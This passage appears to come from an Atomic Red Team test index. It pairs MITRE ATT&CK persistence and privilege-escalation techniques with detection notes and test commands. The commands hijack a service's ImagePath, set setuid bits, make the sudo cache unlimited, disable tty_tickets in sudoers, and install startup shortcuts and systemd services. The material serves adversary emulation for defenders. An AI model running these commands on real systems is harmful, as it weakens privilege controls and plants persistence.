If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - - Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1574.011 - atomic_tests: - - name: Service Registry Permissions Weakness - auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
- reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service check - type: String - default: weakservicename - executor: - command: | - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell - - name: Service ImagePath Change with reg.exe - auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - description: 'Change Service registry ImagePath of a bengin service to a malicious - file - -' - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service name - type: String - default: calcservice - weak_service_path: - description: weak service path - type: String - default: "%windir%\\system32\\win32calc.exe" - malicious_service_path: - description: malicious service path - type: String - default: "%windir%\\system32\\cmd.exe" - dependency_executor_name: powershell - dependencies: - - description: 'The service must exist (#{weak_service_name}) - -' - prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit - 1} - -' - get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - -' - executor: - command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" - /f /v ImagePath /d "#{malicious_service_path}" - -' - cleanup_command: 'sc.exe delete #{weak_service_name} - -' - name: command_prompt - T1548.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.001 - url: https://attack.mitre.org/techniques/T1548/001 - - url: http://man7.org/linux/man-pages/man2/setuid.2.html - description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. - Retrieved September 21, 2018. 
- source_name: setuid man page - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Setuid and Setgid - description: |- - An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. - - Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. - - Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). 
- id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T00:43:58.149Z' - created: '2020-01-30T14:11:41.212Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor the file system for files that have the setuid or - setgid bits set. Monitor for execution of utilities, like chmod, and their - command-line arguments to look for setuid or setguid bits being set. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Linux - - macOS - identifier: T1548.001 - atomic_tests: - - name: Make and modify binary from C source - auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 - description: 'Make, change owner, and change file attributes on a C source code - file - -' - supported_platforms: - - macos - - linux - input_arguments: - payload: - description: hello.c payload - type: path - default: PathToAtomicsFolder/T1548.001/src/hello.c - executor: - command: | - cp #{payload} /tmp/hello.c - sudo chown root /tmp/hello.c - sudo make /tmp/hello - sudo chown root /tmp/hello - sudo chmod u+s /tmp/hello - /tmp/hello - cleanup_command: | - sudo rm /tmp/hello - sudo rm /tmp/hello.c - name: sh - elevation_required: true - - name: Set a SetUID flag on file - auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 - description: 'This test sets the SetUID flag on a file in Linux and macOS. 
- -' - supported_platforms: - - macos - - linux - input_arguments: - file_to_setuid: - description: Path of file to set SetUID flag - type: path - default: "/tmp/evilBinary" - executor: - command: | - sudo touch #{file_to_setuid} - sudo chown root #{file_to_setuid} - sudo chmod u+s #{file_to_setuid} - cleanup_command: 'sudo rm #{file_to_setuid} - -' - name: sh - elevation_required: true - - name: Set a SetGID flag on file - auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c - description: 'This test sets the SetGID flag on a file in Linux and macOS. - -' - supported_platforms: - - macos - - linux - input_arguments: - file_to_setuid: - description: Path of file to set SetGID flag - type: path - default: "/tmp/evilBinary" - executor: - command: | - sudo touch #{file_to_setuid} - sudo chown root #{file_to_setuid} - sudo chmod g+s #{file_to_setuid} - cleanup_command: 'sudo rm #{file_to_setuid} - -' - name: sh - elevation_required: true - T1547.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.009 - url: https://attack.mitre.org/techniques/T1547/009 - - external_id: CAPEC-132 - source_name: capec - url: https://capec.mitre.org/data/definitions/132.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Shortcut Modification - description: |- - Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. - - Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. 
Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. - id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T17:21:27.487Z' - created: '2020-01-24T19:00:32.917Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Since a shortcut's target path likely will not change, modifications - to shortcut files that do not correlate with known software changes, patches, - removal, etc., may be suspicious. Analysis should attempt to relate shortcut - file change or creation events to other potentially suspicious events based - on known adversary behavior such as process launches of unknown executables - that make network connections. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.009 - atomic_tests: - - name: Shortcut Modification - auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - description: | - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; - gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. - Upon execution, calc.exe will be launched. 
- supported_platforms: - - windows - input_arguments: - shortcut_file_path: - description: shortcut modified and execute - type: path - default: "%temp%\\T1547.009_modified_shortcut.url" - executor: - command: | - echo [InternetShortcut] > #{shortcut_file_path} - echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} - #{shortcut_file_path} - cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - -' - name: command_prompt - - name: Create shortcut to cmd in startup folders - auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - description: | - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" - to view the new shortcut. - supported_platforms: - - windows - executor: - command: | - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1037.005: - technique: - id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f - description: "Adversaries may use startup items automatically executed at boot - initialization to establish persistence. 
Startup items execute during the - final phase of the boot process and contain shell scripts or other executable - files along with configuration information used by the system to determine - the execution order for all startup items. (Citation: Startup Items)\n\nThis - is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), - and thus the appropriate folder, /Library/StartupItems isn’t - guaranteed to exist on the system by default, but does appear to exist by - default on macOS Sierra. A startup item is a directory whose executable and - configuration property list (plist), StartupParameters.plist, - reside in the top-level directory. \n\nAn adversary can create the appropriate - folders/files in the StartupItems directory to register their own persistence - mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since - StartupItems run during the bootup phase of macOS, they will run as the elevated - root user." - name: Startup Items - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.005 - url: https://attack.mitre.org/techniques/T1037/005 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. 
- source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:47:39.124Z' - created: '2020-01-15T18:00:33.603Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_detection: |- - The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. - - Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.005 - atomic_tests: - - name: Add file to Local Library StartupItems - auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - description: | - Modify or create an file in /Library/StartupItems - - [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - supported_platforms: - - macos - executor: - command: 'sudo touch /Library/StartupItems/EvilStartup.plist - -' - cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - -' - name: sh - elevation_required: true - T1548.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.003 - url: https://attack.mitre.org/techniques/T1548/003 - - url: https://www.sudo.ws/ - description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. - source_name: sudo man page 2018 - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. 
- source_name: OSX.Dok Malware - - url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does - description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually - Does. Retrieved March 19, 2018. - source_name: cybereason osx proton - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Sudo and Sudo Caching - description: |- - Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. - - Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). - - The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. 
This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. - - Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. - - In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. - id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T01:03:26.306Z' - created: '2020-01-30T14:34:44.992Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - User - x_mitre_detection: On Linux, auditd can alert every time a user's actual ID - and effective ID are different (this is what happens when you sudo). 
This - technique is abusing normal functionality in macOS and Linux systems, but - sudo has the ability to log all input and output based on the LOG_INPUT - and LOG_OUTPUT directives in the /etc/sudoers file. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - x_mitre_platforms: - - Linux - - macOS - identifier: T1548.003 - atomic_tests: - - name: Sudo usage - auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e - description: 'Common Sudo enumeration methods. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" - - name: Unlimited sudo cache timeout - auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc - description: 'Sets sudo caching timestamp_timeout to a value for unlimited. - This is dangerous to modify without using ''visudo'', do not do this on a - production system. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: | - sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers - sudo visudo -c -f /etc/sudoers - - name: Disable tty_tickets for sudo caching - auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 - description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous - to modify without using ''visudo'', do not do this on a production system. - -' - supported_platforms: - - macos - - linux - executor: - name: sh - elevation_required: true - command: |- - sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" - sudo visudo -c -f /etc/sudoers - T1543.002: - technique: - id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b - description: "Adversaries may create or modify systemd services to repeatedly - execute malicious payloads as part of persistence. 
The systemd service manager - is commonly used for managing background daemon processes (also known as services) - and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: - Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization - (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, - CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit - and Upstart while remaining backwards compatible with the aforementioned init - systems.\n\nSystemd utilizes configuration files known as service units to - control how services boot and under what conditions. By default, these unit - files are stored in the /etc/systemd/system and /usr/lib/systemd/system - directories and have the file extension .service. Each service - unit file may contain numerous directives that can execute system commands:\n\n* - ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands - when a services is started manually by 'systemctl' or on system start if the - service is set to automatically start. \n* ExecReload directive covers when - a service restarts. 
\n* ExecStop and ExecStopPost directives cover when a - service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd - functionality to establish persistent access to victim systems by creating - and/or modifying service unit files that cause systemd to execute malicious - commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries - typically require root privileges to create/modify service unit files in the - /etc/systemd/system and /usr/lib/systemd/system - directories, low privilege users can create/modify service unit files in directories - such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: - Rapid7 Service Persistence 22JUNE2016)" - name: Systemd Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.002 - url: https://attack.mitre.org/techniques/T1543/002 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - source_name: Freedesktop.org Linux systemd 29SEP2018 - url: https://www.freedesktop.org/wiki/Software/systemd/ - description: Freedesktop.org. (2018, September 29). systemd System and Service - Manager. Retrieved April 23, 2019. - - source_name: Anomali Rocke March 2019 - url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With - a New Malware Family Written in Golang. Retrieved April 24, 2019. 
- - source_name: Rapid7 Service Persistence 22JUNE2016 - url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence - description: Rapid7. (2016, June 22). Service Persistence. Retrieved April - 23, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.701Z' - created: '2020-01-17T16:15:19.870Z' - x_mitre_platforms: - - Linux - x_mitre_detection: |- - Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.2' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - identifier: T1543.002 - atomic_tests: - - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - description: 'This test creates a Systemd service unit file and enables it as - a service. 
- -' - supported_platforms: - - linux - input_arguments: - systemd_service_path: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system" - systemd_service_file: - description: File name of systemd service unit file - type: String - default: art-systemd-service.service - execstoppost_action: - description: ExecStopPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstoppost-marker" - execreload_action: - description: ExecReload action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execreload-marker" - execstart_action: - description: ExecStart action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstart-marker" - execstop_action: - description: ExecStop action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstop-marker" - execstartpre_action: - description: ExecStartPre action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpre-marker" - execstartpost_action: - description: ExecStartPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpost-marker" - executor: - command: | - echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} - echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} - echo "Type=simple" - echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStop=#{execstop_action}" >> 
#{systemd_service_path}/#{systemd_service_file} - echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} - echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - systemctl enable #{systemd_service_file} - systemctl start #{systemd_service_file} - cleanup_command: | - systemctl stop #{systemd_service_file} - systemctl disable #{systemd_service_file} - rm -rf #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - name: bash - T1053.006: - technique: - id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 - description: |- - Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) - - Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. 
- - An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. - name: Systemd Timers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1053.006 - url: https://attack.mitre.org/techniques/T1053/006 - - source_name: archlinux Systemd Timers Aug 2020 - url: https://wiki.archlinux.org/index.php/Systemd/Timers - description: archlinux. (2020, August 11). systemd/Timers. Retrieved October - 12, 2020. - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - source_name: gist Arch package compromise 10JUL2018 - - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. 
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-14T15:20:00.754Z' - created: '2020-10-12T17:50:31.584Z' - x_mitre_platforms: - - Linux - x_mitre_contributors: - - SarathKumar Rajendran, Trimble Inc - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. 
- - Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1053.006 - atomic_tests: - - name: Create Systemd Service and Timer - auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - description: "This test creates Systemd service and timer then starts and enables - the Systemd timer \n" - supported_platforms: - - linux - input_arguments: - path_to_systemd_service: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system/art-timer.service" - path_to_systemd_timer: - description: Path to service timer file - type: Path - default: "/etc/systemd/system/art-timer.timer" - systemd_service_name: - description: Name of systemd service - type: String - default: art-timer.service - systemd_timer_name: - description: Name of systemd service timer - type: String - default: art-timer.timer - executor: - command: | - echo "[Unit]" > #{path_to_systemd_service} - echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} - echo "[Service]" >> #{path_to_systemd_service} - echo "Type=simple" >> #{path_to_systemd_service} - echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} - echo "[Install]" >> #{path_to_systemd_service} - echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} - echo "[Unit]" > #{path_to_systemd_timer} - echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} - echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "[Timer]" >> #{path_to_systemd_timer} - echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} - echo "[Install]" >> #{path_to_systemd_timer} - echo "WantedBy=timers.target" >> 
#{path_to_systemd_timer} - systemctl start #{systemd_timer_name} - systemctl enable #{systemd_timer_name} - systemctl daemon-reload - cleanup_command: | - systemctl stop #{systemd_timer_name} - systemctl disable #{systemd_timer_name} - rm #{path_to_systemd_service} - rm #{path_to_systemd_timer} - systemctl daemon-reload - name: bash - T1055.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.003 - url: https://attack.mitre.org/techniques/T1055/003 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Execution Hijacking - description: "Adversaries may inject malicious code into hijacked processes - in order to evade process-based defenses as well as possibly elevate privileges. - Thread Execution Hijacking is a method of executing arbitrary code in the - address space of a separate live process. \n\nThread Execution Hijacking is - commonly performed by suspending an existing process then unmapping/hollowing - its memory, which can then be replaced with malicious code or the path to - a DLL. A handle to an existing victim process is first created with native - 